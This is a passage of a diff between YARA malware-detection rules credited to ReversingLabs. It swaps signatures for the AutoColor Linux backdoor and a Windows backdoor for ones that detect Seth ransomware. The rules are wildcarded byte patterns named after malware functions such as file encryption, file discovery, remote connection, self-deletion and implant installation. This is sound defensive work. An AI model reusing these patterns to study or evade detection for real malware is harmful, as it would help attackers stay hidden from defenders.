-        13 ?? 11 ?? 6F ?? ?? ?? ?? 1F ?? 33 ?? 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
-        ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 06 11 ?? 28
-    }
-		$send_v2 = {
-        7E ?? ?? ?? ?? 2D ?? 16 2A 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 2D ?? 16 13 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 02 8E 69 13 ?? 12 ?? 28 ?? ?? ??
-        ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 12 ?? 28 ?? ?? ?? ?? 0D 07 09 16 09 8E 69 6F ??
-        ?? ?? ?? 07 02 16 02 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 6F ?? ??
-        ?? ?? 16 07 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 11 ?? 28
-        ?? ?? ?? ?? DC DE ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 16 80 ?? ?? ??
-        ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 28 ?? ?? ?? ?? DE ?? 7E ?? ?? ?? ??
-        2A 11
-    }
+		$encrypt_files = {
+            73 ?? ?? ?? ?? 0A 06 04 7D ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 25 2D
+            ?? 26 06 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 0C 7D ?? ?? ?? ?? 08 7E ?? ?? ?? ?? 25
+            2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ??
+            FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D
+            ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0D 00 00 09 03 28 ?? ??
+            ?? ?? 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 26 00 00 DE ?? 26 00 00 DE
+            ?? 00 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 2A
+        }
+		$find_files = {
+            00 73 ?? ?? ?? ?? 0A 00 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17
+            72 ?? ?? ?? ?? A2 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 12 ?? 28 ??
+            ?? ?? ?? 0C 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE
+            ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 06
+            0D 2B ?? 09 2A
+        }
+		$get_file_list = {
+            00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 2C
+            ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 38 ?? ??
+            ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B
+            00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 00 07 09 6F ?? ??
+            ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+            DC 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 00 00 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $persistence_mechanism_v1_p* ) ) and ( all of ( $connect_v1_p* ) ) and ( $send_v1 ) and ( all of ( $receive_v1_p* ) ) ) or ( ( $connect_v2 ) and ( $receive_v2 ) and ( all of ( $get_system_information_v2_p* ) ) and ( $send_v2 ) ) )
+		uint16( 0 ) == 0x5A4D and ( $get_file_list ) and ( $find_files ) and ( $encrypt_files )
 }
-rule REVERSINGLABS_Linux_Backdoor_Autocolor : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win64_Ransomware_Seth : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects AutoColor backdoor."
+		description = "Yara rule that detects Seth ransomware."
 		author = "ReversingLabs"
-		id = "c6fea724-bd3d-56a0-a8c1-2e4d2e549766"
-		date = "2025-04-11"
-		modified = "2025-04-11"
+		id = "001de900-4556-5428-a243-7ec07a7ed05e"
+		date = "2021-04-02"
+		modified = "2021-04-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.AutoColor.yara#L1-L177"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Seth.yara#L1-L122"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "068d4d6916437197d4b3ac9c05803a35e15c00b0e70cb61ad6361981dc7cfee3"
+		logic_hash = "72a9d902eea2381f40d42faa7f1686c4ca54d364af0cbd8711697bbc1a235646"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "AutoColor"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Seth"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$install_library_implant_p1 = {
-            F3 0F 1E FA 55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
-            89 45 ?? 31 C0 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
-            8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35
-            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48
-            8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
-            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ??
-            48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ??
-            ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6
-            48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
-            89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89 85 ??
-            ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
-        }
-		$install_library_implant_p2 = {
-            E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? EB ?? 8B 45 ??
-            4C 63 E0 48 8B 5D ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 4C 89 E2 48
-            89 DE 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ??
-            ?? ?? ?? EB ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
-            ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 D8 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ??
-            ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F
-            1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ??
-            ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F
-            1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81
-            C4 ?? ?? ?? ?? 5B 41 5C 5D C3
-        }
-		$self_delete = {
-            F3 0F 1E FA 55 48 89 E5 53 48 83 EC ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0
-            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 83
-            7D ?? ?? 74 ?? 8B 5D ?? EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 5D ?? EB ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
-            E8 ?? ?? ?? ?? 89 D8 48 8B 55 ?? 64 48 33 14 25 ?? ?? ?? ?? 74 ?? EB ?? F3 0F 1E FA
-            48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 83 C4 ?? 5B 5D C3
-        }
-		$execute_local_file_p1 = {
-            F3 0F 1E FA 55 48 89 E5 41 55 41 54 53 48 81 EC ?? ?? ?? ?? 48 83 0C 24 ?? 48 81 EC
-            ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 48 89 8D ?? ??
-            ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 9D ?? ?? ?? ?? 41 BC ?? ??
-            ?? ?? 49 89 DD 4D 85 E4 78 ?? 4C 89 EF E8 ?? ?? ?? ?? 49 83 C5 ?? 49 83 EC ?? EB ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 39 85 ?? ?? ?? ?? 7D ??
-            48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 C1 E2 ?? 48 01 C2 48 8B 85 ?? ??
-            ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? EB ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2
-            48 8D 85 ?? ?? ?? ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? E8 ?? ??
-            ?? ?? 8B 00 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 74
-            ?? 8B 85 ?? ?? ?? ?? 83 C8 ?? 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
-            DE 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? E8 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 88 ?? ??
-            ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89
+		$encrypt_files_p1 = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 85 ??
+            ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
+            89 C1 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 48 8B 95 ??
+            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
+            48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 0D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48
+            8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89
+            C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48
+            8D 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85
         }
-		$execute_local_file_p2 = {
-            C7 E8 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7D ?? 8B 85 ?? ?? ?? ?? 89
-            C7 E8 ?? ?? ?? ?? 85 C0 83 85 ?? ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E8 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 78 ??
-            48 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 01 D0 0F B6 00 3C ?? 75 ?? 48 8B 85
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 83 C2 ?? 48 01 C2 48 8D 85 ?? ?? ?? ?? 48
-            89 D6 48 89 C7 E8 ?? ?? ?? ?? EB ?? 83 85 ?? ?? ?? ?? ?? EB ?? 48 8B 85 ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 39
-            85 ?? ?? ?? ?? 7D ?? 8B 85 ?? ?? ?? ?? 8D 48 ?? 8B 85 ?? ?? ?? ?? 48 98 48 C1 E0 ??
-            48 8D 75 ?? 48 01 F0 48 2D ?? ?? ?? ?? 48 8B 10 48 63 C1 48 89 94 C5 ?? ?? ?? ?? 83
+		$encrypt_files_p2 = {
+            48 89 C2 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 8B 85
+            ?? ?? ?? ?? 89 C2 E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48
+            63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48
+            8B 95 ?? ?? ?? ?? 48 8D 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 48 63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83
+            BD ?? ?? ?? ?? ?? 74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
+            89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
+            ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ??
+            48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ??
+            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ??
+            ?? 5B 5D C3
         }
-		$execute_local_file_p3 = {
-            85 ?? ?? ?? ?? ?? EB ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 83 C0 ?? 48 98 48 C7 84 C5 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 85
-            ?? ?? ?? ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 41 89 C4 90 48
-            8D 9D ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 39 C3 74 ?? 48 83 EB
-            ?? 48 89 DF E8 ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 44 89
-            E0 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? F3 0F 1E
-            FA 49 89 C5 48 85 DB 74 ?? B8 ?? ?? ?? ?? 4C 29 E0 48 C1 E0 ?? 4C 8D 24 03 49 39 DC
-            74 ?? 49 83 EC ?? 4C 89 E7 E8 ?? ?? ?? ?? EB ?? 4C 89 EB EB ?? F3 0F 1E FA 48 89 C3
-            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 49 89 DC EB ?? F3 0F 1E FA 49 89 C4 48
-            8D 9D ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 39 C3 74 ?? 48 83 EB
-            ?? 48 89 DF E8 ?? ?? ?? ?? EB ?? 4C 89 E3 EB ?? F3 0F 1E FA 48 89 C3 48 8D 85 ?? ??
-            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81
-            C4 ?? ?? ?? ?? 5B 41 5C 41 5D 5D C3
+		$remote_connection_p1 = {
+            55 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ??
+            ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 85 ?? ??
+            ?? ?? 41 89 D0 48 89 C2 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 05 ??
+            ?? ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA
+            C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ?? ?? 29 C1 89 C8 8D 88 ?? ?? ?? ??
+            48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48
+            8B 05 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ??
+            BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ??
+            48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B 95 ?? ?? ??
+            ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 48
+            8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB
+            ?? 8B 8D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            48 C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 41 89 C8 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B8
+            ?? ?? ?? ?? 44 8D 40 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
+            ?? 49 89 C9 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 85 C0
         }
-		$network_proxy_communication_p1 = {
-            F3 0F 1E FA 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 83 0C 24 ?? 48 81 EC ?? ?? ?? ?? 48
-            89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0
-            B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89 D7 FC F3 48 AB 89 F8 89 CA
-            89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48
-            C2 C1 F8 ?? 89 C6 48 63 C6 48 8B BC C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1
-            EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0 48 09 C7 48 89 FA
-            48 63 C6 48 89 94 C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48 C2
